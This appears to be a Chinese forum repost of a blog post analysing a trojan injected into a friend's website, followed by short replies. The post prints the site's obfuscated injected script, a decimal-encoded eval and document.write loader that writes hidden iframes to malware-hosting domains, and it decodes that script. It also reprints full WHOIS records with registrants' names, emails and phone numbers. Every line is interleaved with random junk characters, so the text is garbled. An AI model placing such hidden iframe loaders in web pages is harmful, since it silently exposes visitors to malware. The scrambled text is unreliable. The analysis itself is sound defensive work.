[原创]一篇刚写的分析木马手记

首发在我的博客里面， Y:XxTa*  
z,B'I.)M  
http://www.areway.cn/?p=175 g4^df%)&  
N!F
;!  
D+vHl}  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： E`SFr  
          3pKr {U92  
<script>t=’60,105,102,114,97,109,101, ?$xZ$zW  
32,115,114,99,61,104,116,116,112,58,47,47, 3YF*TxKx  
102,114,101,101,46,117,45,117,117,117,46,99, KCkA4`IeM  
110,47,101,114,114,111,114,46,104,116,109, v-@xO&<  
32,119,105,100,116,104,61,49,48,48,32,104, CCZ]`*wJ  
101,105,103,104,116,61,48,62,60,47,105,102, 9 &~Rj 9  
114,97,109,101,62′; zy9# *gGq  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> G.a^nQ@e%  
                                                                                                  L7tC?F]}SK  
<script>t=’60,105,102,114,97,109,101,32,115, 3M{/9rR[  
114,99,61,104,116,116,112,58,47,47,102,114, } .cP  
101,101,46,117,45,117,117,117,46,99,110,47, v1Lu.JQC$  
101,114,114,111,114,46,104,116,109,32,119, P=V=\T<4_  
105,100,116,104,61,49,48,48,32,104,101,105, 4#m"t?6!  
103,104,116,61,48,62,60,47,105,102,114,97, %Ot^G%34  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); ')/yBH9mR  
document.write(t);</script> -\!"Kz/  
                                                                                                  z`D;8x2b  
<html xmlns=” 3g]Sp/  
http://www.w3.org/1999/xhtml ?qt>;o|Ue  
“> @iwg`j6ol  
<head> "7pd(p *C  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> }*4K]3et$  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> iVt*N$iZ  
<title>首页 - 爱生活家庭网 wV;qc3  
                                                                                                                                                    ;w,g|=RQ  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 .h
2K$(/  
转换字符串后的大概内容是（谁点击后果自付）：  ajayj|h  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… ttPa[h{!  
                                                                                                                                  mzz77i  
查询玉米u-uuu.cn的详细信息： Y,kTk  
Domain Name: u-uuu.cn c"3 a
,&  
ROID: 20070901s10001s64972306-cn ~/6m|k  
Domain Status: ok  Yq.Cz:>b  
Registrant Organization: 王雷 8#w}wGV*  
Registrant Name: 王雷 yD+)!q"  
Administrative Email: czlovexs@126.com [e+"G <>  
Sponsoring Registrar: 北京万网志成科技有限公司 ?+S&`%?  
Name Server:ns.yovole.com E+AEV`-  
Name Server:ns1.yovole.com >uuP@j  
Registration Date: 2007-09-01 17:54 37wm[Z  
Expiration Date: 2008-09-01 17:54 Z;aQ/n[`  
最后PING了一下地址 都没有什么…. ;Bo{.91
6  
                                                                                                `n]y"rj'  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. 88 *K  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> QUp()B1  
<script language=”javascript” src=” xoD5z<<  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script L\8tqy.  
> 9qe6hF/29  
这个玉米应该有可能是木马作者的： x
)wIGo  
foafau.info的详细信息： XX5 ):1  
Access to INFO WHOIS information is provided to assist persons in MC!K7ji  
determining the contents of a domain name registration record in the '
!64_OMj'  
Afilias registry database. The data in this record is provided by :Xv3< rS<  
Afilias Limited for informational purposes only, and Afilias does not @ba5iIt  
guarantee its accuracy.  This service is intended only for query-based ip4:px-  
access. You agree that you will use this data only for lawful purposes b<qv /t)$  
and that, under no circumstances will you use this data to: (a) allow, twqjaFA>  
enable, or otherwise support the transmission by e-mail, telephone, or SeBbI&Ju  
facsimile of mass unsolicited, commercial advertising or solicitations BYN<|=  
to entities other than the data recipient’s own existing customers; or x"~F=jT  
(b) enable high volume, automated, electronic processes that send >b#z o,  
queries or data to the systems of Registry Operator, a Registrar, or XB-pOt
Vm  
Afilias except as reasonably necessary to register domain names or *usfJ-  
modify existing registrations. All rights reserved. Afilias reserves \Nu(+G?e  
the right to modify these terms at any time. By submitting this query, F8?&Ql/hdz  
you agree to abide by this policy. |C@)#.nm[  
Domain ID:D22418703-LRMS NjVuwIm+  
Domain Name:FOAFAU.INFO o;mXk2  
Created On:20-Nov-2007 16:05:42 UTC JY#IeNL  
Last Updated On:20-Nov-2007 16:05:44 UTC 2"C'Au  
Expiration Date:20-Nov-2008 16:05:42 UTC |]~tX zY  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) _/ZIDIn  
Status:CLIENT DELETE PROHIBITED 8zGe5Dn9  
Status:CLIENT RENEW PROHIBITED
Ze'AZF  
Status:CLIENT TRANSFER PROHIBITED Qv,|*bf  
Status:CLIENT UPDATE PROHIBITED Z$Ynar  
Status:TRANSFER PROHIBITED {%@zQ|OO0  
Registrant ID:GODA-040110615 f3s0.G#l  
Registrant Name:liu hong N VzR2  
Registrant Organization: ;RW!l pGjP  
Registrant Street1:beijing r80w{[S$  
Registrant Street2: m,$oV?y>j  
Registrant Street3: QP)-O*+AA
 
Registrant City:beijing D,dmlv  
Registrant State/Province: C',D"  
Registrant Postal Code:100000 49~5U+x;  
Registrant Country:CN ~qLbyzHaB  
Registrant Phone:+86.860108888777 07Yh  
Registrant Phone Ext.: CTbdY,=B  
Registrant FAX: s%>>E!Qi_  
Registrant FAX Ext.: C 7YZ;{t  
Registrant Email:bbbshiji@163.com >IC.Zt@  
Admin ID:GODA-240110615 MFaK=1  
Admin Name:liu hong ]]Ypi=<'  
Admin Organization: tXcc#!'4C  
Admin Street1:beijing G6_Kid}"q  
Admin Street2: xIf,1g@Cq9  
Admin Street3: ej47'#EY  
Admin City:beijing GptJQ=pV  
Admin State/Province: Cp&lS=  
Admin Postal Code:100000 aAF:nyV~~0  
Admin Country:CN 'N)&;ADx-G  
Admin Phone:+86.860108888777 bKYLBu:  
Admin Phone Ext.: [Oe$E5qv)]  
Admin FAX: uz".!K[,wE  
Admin FAX Ext.: %YM4x!6  
Admin Email:bbbshiji@163.com w#U3h]>,  
Billing ID:GODA-340110615 4\x'$G  
Billing Name:liu hong :Sk0?WU  
Billing Organization: OqtQLqN  
Billing Street1:beijing t=NPo+fm  
Billing Street2: Y2!OJuyGc  
Billing Street3: j?29_Az  
Billing City:beijing C,hs!v6  
Billing State/Province: uJA8PfbD  
Billing Postal Code:100000 `MlQPLH  
Billing Country:CN kB_GL>fc  
Billing Phone:+86.860108888777 (]^
9>3{|  
Billing Phone Ext.: 9XX&~GW/  
Billing FAX: BJ<hP9#  
Billing FAX Ext.: |8c3%jve  
Billing Email:bbbshiji@163.com wo$9$~(  
Tech ID:GODA-140110615 }H!c9Y  
Tech Name:liu hong 4K[E3aA  
Tech Organization: YwQxN"  
Tech Street1:beijing *4Y1((1k
 
Tech Street2: Dr$k6kZ}'U  
Tech Street3: uDay||7^g  
Tech City:beijing 28C/^4  
Tech State/Province: {=PO`1H  
Tech Postal Code:100000 Mi,yg=V  
Tech Country:CN D5Wo e&g,  
Tech Phone:+86.860108888777 $FZ~]Ef  
Tech Phone Ext.: ;U<;R  
Tech FAX: Q}d6+C  
Tech FAX Ext.: '}e_8FS  
Tech Email:bbbshiji@163.com m"<0sqD;  
Name Server:NS27.DOMAINCONTROL.COM >K1)XP  
Name Server:NS28.DOMAINCONTROL.COM RmY5/IYR|:  
Name Server: _,"T;i  
Name Server: 'U.)f@L#w  
Name Server: O;9u1,%w  
Name Server: Dz
:A.x@$*  
Name Server: 21bvSK  
Name Server: |)* K#%j  
Name Server: f)l:^/WP+  
Name Server: 8s-y+M@.  
Name Server:  msM  
Name Server: 7/a[;`i*!  
Name Server: S3EY9:^C  
                                                                                                          _?M34&.X  
接着下载每个文件里面的代码： 6x)7=_:0  
一步一步看.. P{i\x#  
M' e<\wqm  
m.pB]yq&  
jB!p,fqcb  
I;<0v@  
B\r2M`N5  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。